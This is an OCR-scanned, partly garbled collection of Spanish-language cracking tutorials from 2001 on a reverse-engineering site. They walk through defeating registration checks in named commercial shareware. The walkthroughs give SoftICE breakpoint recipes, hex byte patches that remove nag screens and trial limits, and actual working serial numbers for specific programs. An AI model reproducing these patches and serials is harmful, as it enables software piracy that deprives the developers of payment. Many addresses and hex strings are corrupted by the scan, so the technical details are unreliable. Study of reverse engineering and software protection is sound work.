usando el softice segunda nag 
screen 


ahora vamos a quitar la segunda nag screen que aparece en el inicio del programa, ok!!! continuemos con este torito!!! 


memoria 004018caencontramos que ahi se genera la segunda nag screen, ok! entonces borremosla esa call, saquemos su 
offset que es:18ca y abrimos el editor hexadecimal y cambiamos e8e1100000 por 9090909090 y guardamos los 


usando el w32dasm limite de 
20 archivos de exportación 


ok!! ahora quitaremos el limite de 20 archivos de exportación. 


cuando queremos poner la cantidad de archivos a generar en la opcion de auto numbering form nos aparece esta 
messagebox 


MN You carmot use he DEMO version of GRXport to generate a hist of more than 20 files 


[cepa] 


aqui tendriamos dos formas de atacar esa messagebox: 
1. usar el softice poniendo un break point en messageboxa 
2. desensamblar el ejecutable para buscar el string que aparece en la messagebox 


estas son las dos formas que se me ocurren usar, pero como me dijo un amigo, siempre busca la forma mas facil de 
hacer las cosas, ok!!!!, entonces vamos y abrimos el w32dasm y desensamblamos el ejecutable del grxport, una vez 
desensamblado vamos a el icono de string references y damos click en el y aparecera una ventana en la cual apareceran 
todos los strings que existen en el ejecutable una vez ahi buscamos , buscamos y buscamos y por fin casi a lo ultimo 
encontramos la string reference que dice'' you cannot use this demo version''damos doble clik sobre el y nos manda a 
la parte del codigo que hace referencia : 


* referenced by a (u)nconditional or (c)onditional jump at address: 

1:00401f51(c)| 

:00401f66 2bc1 sub eax, ecx 

:00401f68 83f814 cmp eax, 00000014 <---- comparacion del numero introducido con 14 hex 
:00401f6b 7e13 jle 00401180 <---salto sospechoso :)d 

:00401f6d 6a00 push 00000000 


:00401f6f 6400 push 00000000 


* possible stringdata ref from data obj->'"you cannot use the demo version 
->"of grxport to generate a list of more than 20 files" 

00401171 6804614000 push 00406104<-- caemos aqui 

* reference to: mfc42.ordinal:04b0, ord:04b0h 

:00401f76 e8ad110000 call 00403128 

:00401f7b e904030000 jmp 00402284 

* referenced by a (u)nconditional or (c)onditional jump at address: 

¡RO0401Í6D(C)...ooocoooccncncncono no. 

como podemos ver unas lineas mas arriba hay un salto sospechoso : 


:00401f68 83£f814 cmp eax, 00000014 <---- comparacion del numero introducido con 14 en hexadecimal que es 20 
en decimal. 


:00401f6b 7e13 jle 00401180 <---salto sospechoso :)d 

despues de la comparación viene un salto ¡le que significa "jump if less or equal" ''salta si es menor o igual" ok 
creo que lo tenemos, ahora solo tenenemos que cambiar ese salto por un salto incondicional que seria jmp para 
que salte no importando el valor que tenga, ok para eso vamos y apuntamos su offset que es: 1f6b ok ahora 
abrimos el ejecutable del grxport en el editor hexadecimal y damos contro g y ponemos ahi el offset y damos ok y 
saltamos directamente a la parte donde cambiaremos: 

00002bc183f8147e136400620068 

por 


00002bc183f814eb1362006a40068 


guardamos los cambios y ejecutamos el programa y ninguna nag screen y ponemos mas de 20 archvios damos 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. profesor_x 


saludos 


e [dek_oin ] 
e txeli 

e Kuato_thor 
e Crkviz 


e code_mex 


e metamorfer 
e txotxo 
e raziel 
e turbop 


e karpoff http:/ /welcome.to/ karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http:// www.finspec. swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Desktop Detective v2.1 

PROTECCION: Serial 

Objetivo: Encontrar un numero de serie 

Descripcion: 

Dificultad: Novato 

DOWNLOAD: http://www.bitlogic.co.uk 

Herramientas: Softice 

CRACKER: Pedrolas FECHA: 11/01/2001 
introduccion 


desktop detective v2.1 es un programa que realiza un seguimiento de todo lo que 
hacemos en nuestro ordenador, presentandolo en informe y graficos. 
este programa trabaja en background y se desactiva mediante password. 
controla las pulsaciones de teclado, las entradas a internet, etc... o sea que es como un 
detective. 


al atake 


nada mas entrar descubrimos que no aparece un ventana con dos opciones: "licence key" y 
"online order”. pulsamos en "license key" y nos aparece una ventanita donde tenemos que 
poner nuestro numero de registro. 


The Dosktop Debectiv 


0 Deskiondetective 37 


Surviellance System 


Welcome Operator You have used 1 out of 15 Tra Operations 


Application Information bicence Information 


Pe 


Credits Y Ackmowledgements to Software Support E Updates 


Support: software AS bitlogk,c ok 


Enquiries: info'4bRbogr.co.uk 


WebSite: hitos! /werwbitdogk.c ok 


Authonze Licence 
Enter the Licence Key sent with you Order. 


[123456789] 


ahora le damos a "authorize" y como es obvio nos dirá que este numero no sirve y nos saldrá 
una ventana como esta: 


Authorze Licence 


Í NYALID LICENCE KEY 


volvemos a poner nuestro numero de registro falso, pero antes vamos al softice y colocamos 
un 


bpx hmemcpy 

pulsamos enter y f5. 

entonces saltara el sotfice, pulsamos f11 y luego f12 hasta que aparezca la siguiente linea 
00 4dc8ac mov eax,[ebp-0c] 


pulsamos f10 hasta 


mov edx,004dafec d eax y sale el numero falso 

seguimos dando a f10 hasta llegar a la siguiente call 

004dc8b4 call 00404038 

entramos en la call pulsando f8 y le damos 5 veces a £10 hasta ña suiguiente linea 
0040403f cmp eax,edx 

hacemos un d edx y saldrá nuestro numero de registro. 

en mi caso es el: 171200200101 


metemos este numero y el programa nos lo agradecerá con la siguiente ventana: 


Information E 


' A Thankyou for Ordenng and Supporting this Software. 
> Your Licence entilles you to Free Updates and Support 


This Software will now be Activated. Thankyou. 


enhorabuena, ya has conseguido registrar el programa. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Its! Personal v2.9%gy 

PROTECCION: Serial 

Objetivo: Encontrar un numero de serie 

Descripcion: 

Dificultad: Novato 

DOWNLOAD : http: //www.rkssoftware.com 

Herramientas: Softice 

CRACKER: Pedrolas FECHA: 12/01/2001 
introduccion 


1ts! personal v2.9g es un completo diario para nuestro ordenador. ya lo dice en la 
ayuda: 

- attractive, intuitive interface 

- unlimited number of days 

- optional password protection - completely secure 

- WYSIWYyg - use any windows fonts available 

- insert graphics and icons 

- print single pages, separate pages, or merged pages to save paper 
- export to rich text format 

- search and replace 

- Spell checking 

- search all entries for specific text 


al atake 


nada mas entrar descubrimos que no aparece un ventana con un boton que dice register, le 
damos y nos aparece una ventana como esta. 


ponemos nuestro numero de registro falso. 


ahora le damos a "ok" y como es obvio nos dirá que este numero no sirve y nos saldrá una 
ventana como esta: 


You haya entered an Incorrectname and/or serial number Please checkihe following: 


volvemos a poner nuestro numero de registro falso, pero antes vamos al softice y colocamos 
un 


bpx hmemcpy 
pulsamos enter y f5. 


entonces saltara el sotfice, pulsamos f11 y luego f12 hasta que aparezca la siguiente linea 


0048eefe 
0048ef01 
0048ef07 
0048ef0a 
0048ef0d 
0048ef12 


mov eax,[ebp-0c] 

mov ecx,[eax+000001d0] 

mov edx,[ebp-08] 

mov eax,[ebp-04] 

call 00495294 

testal,jal <---dedx nos sale rks-2677086 
<--- d nos sale rks-2728256 


en mi caso es el: rks-2677086 y rks-2728256 


o sea que nos salen dos numeros de registro. 


metemos uno cualquiera de los numeros y el programa nos lo agradecerá con la siguiente 


ventana: 


ltsPersonal 


ML) Señal Number Accepted. 


enhorabuena, ya has conseguido registrar el programa. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Para todos los escritos en VB5 

PROTECCION: Serial único, Serial por nombre. 

Objetivo: 

Descripcion: Análisis de la MSVBVM50.DLL 

Dificultad: Fácil/Intermedia/Difícil 

DOWNLOAD : http://... 

Herramientas: Softice, W32Dasm89 

CRACKER: iDznaK FECHA: O A 
introduccion 


bueno este ensayo esta dedicado a todos los crackers que han tenido la amabilidad de hacer un 
tutorial y ponerlo a disposicion de la gente, y dedicado a karpoff y su grandiosa pajina gue. 


salu!, aqui esta mi ensayo sobre visual basic 5, por supuesto que esto es muy experimental aun me 
falta seguir estudiandolo. un buen metodo para entender a estos programas hechos en vb5 es fabricar 
un propio crackme, de esta manera sabremos por donde va cuando nuestro serial es el correcto y que 
es lo que no hace cuando es falso. este tutorial viene con unos crackmes que yo hice por supuesto 
todo esto con sus respectivas soluciones. 


no quiero saltarme ningun proceso de los cuales hice para llegar a entender algo de la dll msvbvm50 
de vb5 y algo de los ejecutables, aunque si lo hare resumido pero entendible. 


nota: se necesitan de conocimientos basicos sobre el uso de softice, pero tratare de detallar todo lo 
aqui expuesto. 


al atake 


ensayo 1 sobre vb5 


por idznak 


la logica de la libreria msvbvm50.dll 


un poco de teoria 


lo primero que hice antes de tirarme al terreno y comenzar a pelear contra este "lenguaje" fue preguntarme que es 
basicamente un ejecutable en vb y como trabaja, despues de definir hacia donde tenia que apuntar me decidi a crear 
un crackme, trate que no sea algo tan simple pero tampoco me resulto algo extraordinario, no porque no quisiera 
hacerlo sino porque al parecer sangre de programador tengo muy poca. 


me decidi a desensamblar el crackme y me doy cuenta que un ejecutable en vb son llamadas sobre llamadas a esta 
msvbvm50.dll (esto lo sabia hace tiempo pero hasta ahora no me decidia a estudiarlas, pues conocimientos de 
assembly no tenia, ahora almenos entiendo algo) , entonces teniendo este valioso dato me puse a pensar... "si estos 
ejecutables dependen tanto de esta libreria (dll) esque todos deben de tener algo en comun, algo asi como una 
llamada unica para la comprobacion o bien una llamada unica desde la libreria msvbm50 para volver al ejecutable", 
para esto no me sirve smartcheck, asi que acudire a mi gran amigo softice, aunque en un ejercicio quizas 
ocuparemos al smartcheck. 


corro el loader y cargo el crackme, cuando apareci dentro del softice y dentro del codigo del crackme solo vi puros 
"invalid", pero eso se remedia con un f10 (avanzar), luego de esto me di cuenta de lo siguiente (esta es una imagen 
un crackme desensamblado con w32dasmg89, en todo caso esto es comun en todos los ejecutables hechos en vbb, 
me refiero a la estructura del punto de entrada) 


* Reference To: MSVBVMSO. ThunBTMain, Ord: 0064h 


| 
:O040114E FF25AC514000 Jmp dword ptr [0040514C] 


:004011B4 6848124000 push 00401248 


* Reference To: MSVBVYM50. ThanPTMain, Ord: 0064h 

| 
:004011B9 ESFOFFFFFF Call OO40OLLARE 
:004011BE 000000000000 BYTE $ DUP(0) 


cuando estamos en el softice (luego de apretar f10) llegamos a :004011b4 , si seguimos trazando llegamos a 
:004011b9 y apretando f8 esta call nos envia a :004011ae,si en esta direccion apretamos f10 saltamos a [004051ac], 
¿que siginifica esto? pues esto es una direccion de memoria (si me equivoco en la explicacion haganmelo saber) 
cuando el programa llega hasta aca pasa el control a la libreria msvbm50, esto es asi en todos. para entender bien el 
punto de entrada observar la imagen. 


bueno si comenzamos a trazar hasta nuevamente retornar al codigo del programa nos demoraremos mucho... ya lo 
hice, algo masmenos largo y tedioso, pues muchas veces tuve que volver a comenzar pues me pasaba, pero al fin lo 
encontre. 


este punto que a continuacion explico es el producto de muchos traceos y minutos, mas bien horas, pero aqui esta 
para todos. 


en 0f01e57e se ubica una call 0f01e589 si entramos a esta con f8 y trazamos con f10, llegaremos al punto que nos 
interesa. 


algo para tener encuenta: 


todos los programas en vb5 tienen un offset que comienzan con 40xxxxxx y los de msvbm50 comienzan con 


00000. 


el punto que nos interesa: 0f01e5a7 donde hay un call eax (observar el valor de eax). todo esto dentro de msvbmb50. 


si entramos a esta llamada (f8) en esta direccion siempre nos llevara al codigo del ejecutable "la victima", al sitio 
donde se llevan a cabo las "transacciones" y dentro de ese codigo en algun lugar se comprueba nuestra clave con la 
verdadera, siempre dentro de esta call estaran los saltos a "error" o "gracias". 


tambien si ponemos un bpx en la direccion 0f01e5a7 y cargamos un ejecutable de vb5 quebraremos cuando 
comienze a leer los datos de registro. 


cuando nuestra clave es comprobada, o el calculo que sea es finalizado y comprobado, ya sea verdadero o falso, 
retornaremos a la libreria msvbm50, llegando a esto ya no nos sirve (almenos en este ensayo), tenderemos que 
comenzar nuevamente, pero para los programas compilados en p-code entraremos al codigo del programa y 
saldremos casi inmediatamente para volver a la libreria si es que seguimos trazando, bueno he estudiado un 
programa en p-code (webfacil pro) y lo crackie, asi que despues de todo esto pasaremos a ese pequeño ensayo 
sobre el p-code. 


por lo general la clave verdadera aparece despues de un lea ecx,[ la operacion que seal. antes de llegar a esto siempre 
pasamos por muchos mov (en algunas ocaciones), tambien debemos estar atentos a cuando aparezca algo semejante a esto 
mov dworptr [lo que sea], 004xxxxx (cualquier direccion que empiece por 4). 


debemos de estar atentos al valor que toman lor registros eax , ecx y edx (almenos estos son los que e visto y comprobado) 

en eax casi siempre va la clave falsa y en ecx la verdadera, cuando estos tomen un valor que comience con 4xxxxx debemos 
de escribir d eax o d ecx y presionar enter, pues es probable que ally este nuestra clave verdadera, y cuando veamos un mov 
dworptr [lo que sea], 004xxxxx, escribimos d 4xxxxx. tambien debemos estar atentos a valores extraños o sospechosos que 

arroje el registro ecx o edx. 


un ejemplo ficticio: 


supongamos que luego de pasar todos esos mov y despues de unos cuantos f10 mas,el registro ecx adquiere el valor de 
40441288, entonces escribimos d ecx y en la parte superior de la pantalla, bajo los registros, aparecera esto : 


(nota un ejemplo, nada real, ni siquiera los hexas) 
byte prot (1) 
xxxx:40441288 33 00 88 00 cocoociocicionocos MAS DylOS..occcacacianocnanoncanoncana 1.7.c.8.4.e.b. 


lo mas seguro es que si te aparece algo asi (lo que esta en verde), es que esta sea la clave verdadera, pero no 
olvidarse de seguir mirando hacia abajo, puede que continue. 


no en todos los casos se da esta facilidad, algunas veces este caso de que el registro ecx o eax marquen 4xxxxxx y 
que apunte a un serial real no sucede, especialmente cuando el tipo de comprobacion es mas menos facil (una 
multiplicacion) desde el punto de vista que lo vieramos descompilado o source code (aunque paresca extraño). pero 
como dije, esto es un ensayo que nos sirve para aproximarnos un poco mas, quizas buscar este tipo de 
comprobacion en algun programa puede fallar, se nos puede hacer mas dificil, pero eso si, poner un bpx en la 
direccion 0f01e5a7 nunca falla, y entrando a este punto estamos en todo el codigo de generacion y comprobacion, 
con lo cual podemos detectar el lugar que nos da el error y si se nos complica la cosa de obtener un serial valido 
podemos recurrir al listado muerto, o sea, a desensamblar o bien si se prefiere dedica un poco mas de tiempo mas al 
listado generado por softice y comprender el proceso de comprobacion, en todo caso si nos pasamos nos aparecera 
la pantalla de error. 


bueno para entender mejor no hay nada superior a los ejercicios, crackearnos nosotros mismos para despues 
crackear a los que programan por dinero, y estoy muy seguro de que 99 de 100 hacen protecciones peores a las 
nuestras, digo comparandonos con esos monigotes. 


bien como dije al principio, hice unos crackmes, ahora practicaremos con ellos, ira de un nivel facil a uno no tan 
facil, parcharemos y tambien encontraremos un serial valido, y trabajaremos con smartcheck para solucionar una 


parte de un crackme. 
estan linkados, para que no se demore la carga de las paginas. 
p.d en los ejercicios si tengo que referirme a la dll de vb5 la llamare libreria. 


en cada ejercicio quizas encuentre cosas nuevas , pues como dije esto es un ensayo y voy experimentando y 
aprendiendo con cada codigo que paso. 


todos con su tutorial y ordenados por tipo. 


ejercicio 1 ejercicio 2 ensayo 1 p-code 
serial unico serial por nombre webfacil pro 


estudiando a vb5 parte ii - ejercicio 1 


bien, hora de entrar al terreno. 


creo que ya le ha dado un vistazo al ejercicio +41, no pide nombre solo un serial.primero parchemos luego vamos en 
busca de el, he escrito dos soluciones, pero existen otras. 


corremos al softice, luego ejecutamos el loader y cargamos al ejercicio +41, ahora debemos pulsr f10, luego f8, y 
luego f10, cuando estemos en la libreria debemos poner un bpx en la direccion "magica", esta 0f01e5a7, pues este 
es el lugar donde la libreria le devuelve el control al ejecutable para que realice sus operaciones. 


pulsamos f5 hasta que aparezcamos nuevamente en el ejercicio ¿41 (fuera del softice), procedemos a ingresar un 
serial cualquiera y apretamos ok. inmediatamente quebraremos en el lugar donde hemos puesto nuestro bpx, 
cuando estemos alli pulsamos f8 para poder entrar a call eax y comenzamos a trazar con f10, (si gusta tracee 
tranquilo observando los registros y los mov quizas encuentre otras cosas), llegaremos a un lugar donde esta 
ubicadas muchas intrucciones como esta mov [ebp-24], edi, estas intrucciones llegan hasta el offset 004060d5 
(estan todas juntas). 


cuando llegemos a offset 00406118 estar atentos. ( ahora explico que nos encontramos aqui). 


axxx:00406118 8b4db8 mov ecx,[ebp-48] 
pooo::0040611b 51 push ecx 
mov destino,fuente "mueve los datos de fuente hacia destino" 


¡push fuente "guarda la fuente, o sea el valor que la fuente tiene en ese momento" 


continuemos. cuando llegemos a push ecx mirar valor que este tiene, pues si lo buscamos como direccion (d ecx) 
encontraremos el numero que nosotros ingresamos, si encontramos esto es porque ya estamos cerca, asi que ojos 
bien abiertos. 


ya en offset 40612a esta algo que nos interesa. 
xxxx:0040612a (hexa) test ah,40 


xxxx:0040612d 7407 jz 00406136 (si nuestro numero es erroneo salta) 


este testeo es caracteristico para comprobaciones con un numero fijo, algo asi como. 

ifa=7*54 then (esto vendria siendo test ah,40) esto es un ejemplo pues el serial valido no es el producto de 7*54. 
codigo para mostrar el mensage de estamos bien o el codigo para escribir en el registro o donde sea. 

goto salimos: 

else (si es erroneo estamos aqui) 

end if 

salimos 


entonces como primera solucion se podria parchear este salto, como hacemos para que no salte?, pues lo 
nopeamos, o sea cambiamos el 7407 por 9090. 


la seguna solucion, que es la mejor: 


seguimos estando aqui xxxx:0040612d 7407 ¡z 00406136, hechemos un vistazo al codigo que esta un poco mas 
abajo (sin f10) y encontramos que en offset: 


xxxx:0040615b c7458c54430000 mov dword ptr [ebp-74], 00004354 
escribamos 24354 y presionemos enter, entonces nos aparecera 


00004354 000017236 "ct", no tomemos encuenta a "ct". bien ese 17236 es el numero de serie valido. te daras 
cuenta que lo es si haces la primera solucion y luego buscas con el explorador de windows el fichero registrao.crk, 
miralo dentro y encontraras este numero. 


bueno creo que ya tienes una idea de que es lo que hace el programa cuando tu haces la primera solucion, para que 
no queden dudas explico. 


explicacion del codigo: 
xxxx:0040612a (hexa) test ah,40 
xxxx:0040612d 7407 jz 00406136 (si nuestro numero es erroneo salta, vendria a ser else) 


este testeo es caracteristico para comprobaciones con un numero fijo, algo asi como. 


lifa =7*54 then (esto vendria siendo test ah,40) esto es un ejemplo pues el serial valido no es el producto de 754. 
[aqui tendria que ir el codigo para crear el fichero registrao.crk. 

¡cuando parchamos pasamos directamente a la cracion de este fichero y a la escritura sobre este mismo. 

¡goto salimos: 

¡else (si es erroneo estamos aqui) 


¡end if 


:salimos 


de hecho el ejercicio 41 checkea si existe este fichero y verifica si lo que esta escrto dentro de el es correcto, si no 
es asi te seguira pidiendo que ingreses el numero. 


estudiando a vb5 parte ¡ii - ejercicio 2 


salu!. aqui estoy tratando de hacer bien este tuto, y verdad que cuesta un monton redactar algo para que pueda ser 
entendido no tan solo por uno mismo. 


bueno corremos el ejercicio 2 escribimos el nombre y el numero un nro serie cualquiera, entramos al softice y 
ponemos bpx hmemcpy , salimos al ejercicio y pulsamos aceptar. cuando quebramos presionamos f11, escribimos 
bc* para borrar cualquier bpx existente y pulsamos f10 hasta llegar al codigo de la libreria, ponemos el bpx 
"magico", o sea, bpx 0f01e5a7, enter y presionamos f5, quebramos y presionamos f8 para entrar al call eax y 
comenzamos a trazar con f10, estemos atentos al registro ecx y edx. 


ya a la altura de 4029af, si hacemos d ecx podremos ver nuestro nombre, asi que ya debemos estar cerca de la 
generacion del numero de serie verdadero o de la comprobacion. 


ya a la altura de 402b45 observemos el valor de edx, parece algo sospechoso pues no se parece a los valores que 
que siempre se ven (0f01xxxx estos generalmente se refieren a la libreria, pero en edx no tendria porque ya que se 
ocupa eax para referirse a la libreria), veamos que numero da edx, hagamos ?edx y aparecera un numero, 
anotemoslo (lo que esta en "" no sirve para este caso". 


bueno sigamos mas abajo en la altura de 402ce4 mov[ebp-04]-edi, el registro ecx se ve sospechoso o mas bien 
parecido a algo que vimos anteriormente, veamos que numero nos da.?ecx y... se parece al numero que anotaste 
recientemente, es el mismo. salgamos de softice e ingresemos ese numerillo y... eureka. 


este ejercicio solo sirve para corroborar que los numeros verdaderos se guardan en los registros ecx o edx ademas 
de aparecer casi siempre despues de algun mov mas menos sospechoso o bien aislado. 


algo para tener en cuenta en este ejercicio: 


en offset 402a98 ver el valor de edx, suma edx a edx o sea ?edx+edx y te da el mismo valor obtenido recientemente, 
O sea que ya en essa parte el calculo ya fue efectuado en su totalidad. 


estudiando a vb5 parte iv - p-code ensayo 1 


para estudiar este tipo de compilacion se dio el caso de que hace ya bastante tiempo le tenia el ojo echado al 
webfacil pro asi que con este programa intente crackear mi primer p-code con las bases anteriormente explicadas en 
las otras partes de este tutorial. 


lantes de que sigas adelante lee esto: 


lo que vamos ha hacer ahora es estudiar este tipo de compilacion y actualmente utilizada como proteccion en un 
¡programa shareware que porsupuesto tiene su valor monetario, asi que todo lo que vas a leer es solo con fines 


¡educativos y no para joder al programador de esta herramienta para novatos en la confeccion de paginas guebs, 
¡por eso si el programa te gusto y decides pagar lo que pide el programador (que es bastante poco) deberias de 


hacerlo ya que se lo merece. el programa se descarga desde http://www.webfacil.com 


bueno, ya se sabe lo que se debehacer previamente, el bpx "magico" luego f8 y estamos en el codigo del programa. 


ya sabemos que esta en p-code ahora solo debemos analizar que hace el programa para mostrarnos las pantallas de 
registrate y estas caducao cabrito!. pues el que yo tengo lo caduque. 


aparecemos aqui antes de que aparezca la pantallita y sus botones. 


xx00o:0040adb0 b84c000000 mov eax,0000004c 
XXX OOOO XXXX cmp ax, c033 
xxxx:0040abd9 baa4fb4600 mov edx, 0046fba4 
POO0OEICOOOAKKKAX XXXX push 00401162 


XXOOCIOOOOAX 03 ret 


pulsamos f5 y aparecemos en la pantalla, la mision es aparecer directamente dentro del programa sin importar que 
estemos caducados o no registrados. pulsamos aceptar, quebramos pulsamos f8 y aparecemos en. 


xxxx:0040ad60 b854000000 mov eax,00000054 


si nos fijamos bien el lugar donde estamos se parece bastante al lugar que aparecemos cuando iniciamos el 
webfacil pro. 


entonces que hacemos?, probemos que pasa si cambiamos algunos bits en la segunda instruccion mov en el lugar 
donde aparecemos cuando ejecutamos el webfacil (arriba esta en celeste). 


salgamos del webfacil pro y corramoslo nuevamente f8 y busquemos offset 0040ada5 anotemos su codigo hexa, 
ahora cambiemos el baa4fb4600 que esta en xxxx:0040abd9 por el codigo hexa que anotamos recientemente. 


pulsamos f5 hasta salir de softice y aparecera la pantalla del explorador y luego la pantalla de webfacil pro pero sin 
dias de evaluacion, pulsemos aceptar, vamos a quebrar asi que ahora pongamos bd* para que el brackpoint quede 
diseable. y pulsamos f5, ahora aparecimos dentro de webfacil pro y lo podemos utilizar, esto es bueno pero 
evitemos esa pantalla. 


hacemos todo nuevamente 


ponemos be* para que el breack point quede activo, pulsamos control+ d y corremos el webfacil pro, hacemos los 
mismos cambios anteriores y cuando llegemos a la pantalla pulsamos aceptar entonces quebraremos pulsamos f8 y 
anotamos el codigo hexa de la segunda instruccion mov (la que esta antes del ret) 


una vez anotados escribimos exit en el softice y pulsamos enter, saldremos y aparecera la pantalla de que webfacil 
ha ejecutado una opracion no valida, pulsamos cerrar y corremos nuevamente webfacil pro, quebramos pulsamos f8 
y cambiamos el baa4fb4600 que esta en xxxx:0040abd9 por ba1ce04500 escribimos bd* enter y f5, y... perfecto 
estamos dentro de webfacilpro sin pasar por ninguna pantalla previa que nos diga que nos registremos. 


ahora solo debe efectuar los cambios con un editor hexa y el programa quedara sin limitaciones. 


no creo que sea necesario hacer aclaraciones sobre el cambio que hemos hecho, pero si tiene dudas escribame al 
email. 


por ahora este primer ensayo esta concluido, pero si ud desea aportar o mejorar esto porfavor hagalo que nos 
servira a todos. 


seguire estudiando a este visual basic y su libreria para poder hacer un segundo ensayo mas contundente, si ud 
¡quiere ayudarme pues venga hermano. 


¡ojala que les haya servido este ensayo... salu! 


idznakOc4.com 


el cracker jamas se vende, su trabajo tampoco. 


estudiando a vb5 parte ¡i "la teoria" 


si puedes ayudar a perfeccionar este ensayo, no esperes mas y destripemos a la libreria, si este ensayo te ayuda a 
perfeccionarte sere el mas contento. 


todos los derechos son de todos (n)o hay copy right 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 2001 


Offline Explorer 1.2 


PROTECCION: Name / Serial 

Objetivo: Encontrar un numero de serie valido 

E 
Dificultad: Novato 

DOWNLOAD: http: //www.metaproducts.com 

Herramientas: Softice 

CRACKER: Cbto FECHA: 15/01/2001 


introduccion 


saludos a todos. antes que nada me presentare, soy cbto, este es mi primer tutorial, soy un newbie, y este es 


mi primer "logro". 


espero que esto ayude a alguien mas, ya que leyendo otros tutoriales y practicando mucho fue como triunfe 
sobre este programa. 


al atake 


bueno, primero cargamos el programa y lo miramos, lo evaluamos, y blah, blah, blah... 

ahora, vamos al menu "help", y en "about offline explorer" damos click 

nos sale una ventana con un mensaje diciendonos que podemos evaluar el programa por 30 dias, que despues hay que 
registrarse ....blah, blah, blah... 

hacemos click en "register", y en la siguiente pantalla metemos nuestros datos, en mi caso quedaran asi: 


registered user: cbto 
registration key: 123456 


asi que ahora le damos en 'ok', y....... ahhh!!!! que la ... una graciosisima ventana mandandonos a la goma diciendonos 
que no le atinamos. parece que adivinar no es la solucion, asi que tendremos que meterle mano, bueno, ya que.... 
volvemos a darle a "register", nuevamente le metemos nuestros datos, y antes de darle a "ok", abrimos el softice con 
ctrl-d, ponemos un bpx hmemcpy, y f5 para salir de nuevo al programa. 

ahora si, le damos a "ok", y entramos al softice. f5 nuevamente, y f12 hasta llegar al codigo del programa, eso lo sabras 
cuando en la ventana de codigo en la linea verde veas el nombre del ejecutable. desactivamos el bpx hmemcpy 
escribiendo bc 00 

damos f10 varias veces, y nos paramos en 004b7714. y por que ahi?, bueno por que ahi encontramos lo siguiente: 


:004b7714 es8£7b00000 call 004c2810 
:004b7719 84c0 test al, al 
:004b771b 7465 je 004b7782 


mmm, una call, un test, y un salto condicional, se ve medio sospechoso asi que entremos a husmear que hace esa call 
cuando estes encima de 004b7714, dale f8 para entrar en la call, y vamos pulsando f10. como veras hay una serie de 
comprobaciones (son un chingo!) asi que adelante (por que no?). 

seguimos con f10 hasta llegar a: 


:004c29fd 8b45f8 mov eax, dword ptr [ebp-08] 


ahi escribimos d edx, y mira la ventana de datos...que bonito!!, que barbaridad!!, es un numero algo extraño, asi que 
por que no lo apuntamos? 

si unas lineas antes de llegar a 004c29fd, te paras en los mov, y escribes d edx, y d eax, veras que en la ventana de 
datos aparece el nombre que pusiste, y tambien otros nombres (li lu, john john, hambo/core, demonsoft, etc...). parece 
que el programa compara tu nombre con alguno de estos, por si las dudas yo creo... 

en fin, ya tenemos un numero que a mi gusto se parece mucho a un serial, asi que salimos del softice, volvemos a 
poner nuestro nombre y el numero que encontramos y.... 

¡perfecto, tenemos un numero valido para nuestro nombre! 


pues parece que este programa nos pela los dientes ya que hemos logrado nuestro objetivo 


algunos datos mas 


el numero es tipo XXXXXX-XXXXXXXXX-XX, la parte de enmedio, a veces son 8 y a veces son 9 digitos (lo probe con 
varios nombres), y la parte final son 2 letras 


si eres del tipo curioso, prueba a desensamblarlo, esta comprimido, asi que necesitaras el gettyp y el procdump. 
intentalo, y podras ver lo que te comentaba de los nombres. 


tu nombre y numero de registro lo guarda en: hkey_usersl.defaultisoftwarelmetaproductstoffline exploreniparameters. 
si borras esas claves, desregistraras el programa, y podras practicar algunas veces mas con otros nombres. 


bueno pues... 


como lo dije al principio, soy un newbie, y me costo bastante lograrlo, pero lo logre...ya saben, en la vida lo unico facil 
es que te den un par de patadas, asi que mis agradecimientos a: 


e mr. mauve 
e maniacpc 
e al 'anonymous' que no dejo su nick en el foro :) 


ustedes me ayudaron muchisimo con sus consejos... gracias. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Uninstall Manager ver. 3.0.0 


PROTECCION: Name/Registration Key. 


Obtener Registration Key (Número Serie) válido para registrarnos 
y Crear un Generador de Claves en Visual Basic. 


Numega SoftlIce 4.05, file insPEctor 3.5 (o similar), Dede v2.34, 
W32Dasm v8.93 (opcional), Visual Basic 6 


INTRODUCCION 


"año nuevo victima nueva” jejeje;) antes de entrar en materia, felicitaros a todos el nuevo año! desde la vieja iruña, 
zorionak eta urte berri on!!! bueno, vayamos al grano con esta nueva "victima" llamada uninstall manager 3.00. 


programa para desinstalar y eliminar programas de nuestro sistema de la empresa nokta software copyright O 1999- 
2000. 


antes de comenzar el atake, hay que tener claro, las herramientas que vamos a emplear, en esta "victima" 
emplearemos en una primera aproximación una herramienta llamada file inspector 3.5 - viper[k-for], nos dirá si 
nuestra "victima" esta empaquetada, compilador, etc, ... toda esta información nos ayudara para un atake más rápido. 


pues, nada vamos al aaaaaattttttanacanaakkkkkkkkeeeeee 


arrancamos el file inspector 3.5 y cargamos nuestra "victima" y observamos lo siguiente en pantalla: 


2, file insPEctor v3.5 - ViPER[K-FoR] 


<A Datos PE Eg Secciones | $ Importaciones/Exportaciones 
Gi] Compilador | E) Herramientas ]  <%Modficar |] acercado... 


Reconocimiento de signaturas 


Compilador: Borland Inprise Delphi 4 


Signatura: 


Versión de la DLL: fi 0 Información. .. ED Enviar signatura... 


Versión del enlazador: [2.25 Versión de la imagen: fo.o 
Versión del 50: fi 0 Versión del subsistema: f4.0 


E3 Abrir archivo... (£Y Analizar 


pues ya esta, nos dice que el uninstall manager 3.00 esta realizado en borland/inprise delphi 4. 


